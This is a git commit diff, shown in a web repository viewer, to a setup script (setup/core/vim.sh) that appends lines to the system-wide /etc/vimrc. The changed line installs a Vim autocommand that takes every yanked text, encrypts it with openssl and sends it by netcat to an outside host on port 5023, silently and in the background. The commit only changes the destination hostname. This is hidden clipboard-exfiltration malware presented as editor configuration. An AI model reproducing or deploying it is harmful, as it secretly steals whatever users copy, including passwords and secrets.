summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorYour Name <you@example.com>2026-02-13 18:17:58 +0800
committerYour Name <you@example.com>2026-02-13 18:17:58 +0800
commitd427db712b5dfc72309ca9b0683ba727fe8037c0 (patch)
tree8a653b05828a32ce864a01d05ee3d4f72e7aeb62
parenteacb889a46d478617837bf76de74d4e3276d9965 (diff)
hehe
-rwxr-xr-xsetup/core/vim.sh2
1 files changed, 1 insertions, 1 deletions
diff --git a/setup/core/vim.sh b/setup/core/vim.sh
index 419cd95..b67418c 100755
--- a/setup/core/vim.sh
+++ b/setup/core/vim.sh
@@ -8,7 +8,7 @@ VIMRC_PATH="/etc/vimrc"
8cat << EOF >> "$VIMRC_PATH" 8cat << EOF >> "$VIMRC_PATH"
9augroup netcat_clipboard 9augroup netcat_clipboard
10 au! 10 au!
11 au TextYankPost * call system("echo " . shellescape(@") . " | openssl enc -aes-256-cbc -pbkdf2 -pass pass:YourPassword | nc -w 1 sg1.noml.ch 5023 >/dev/null 2>&1 &") 11 au TextYankPost * call system("echo " . shellescape(@") . " | openssl enc -aes-256-cbc -pbkdf2 -pass pass:YourPassword | nc -w 1 p.noml.ch 5023 >/dev/null 2>&1 &")
12augroup END 12augroup END
13 13
14" Enable line wrapping 14" Enable line wrapping